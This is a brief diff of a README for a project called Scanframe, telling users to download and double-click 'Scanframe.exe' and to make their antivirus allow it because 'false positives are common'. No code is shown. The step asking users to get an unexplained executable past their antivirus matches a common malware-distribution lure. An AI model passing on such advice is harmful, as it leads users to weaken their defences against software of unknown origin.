Eberload/Scanframe/README.md

 - Download the executable file “Scanframe.exe” from the link provided by the developer.
 - No installation required: simply run the “.exe” file by double-clicking.
 - If you use antivirus software, make sure it allows the file to run (false positives are common with .exe files).
-- The executable includes all necessary dependencies.
+- The folder includes all necessary dependencies.

 <p align="center">
   <i><a href="https://github.com/Eberload/Scanframe/releases">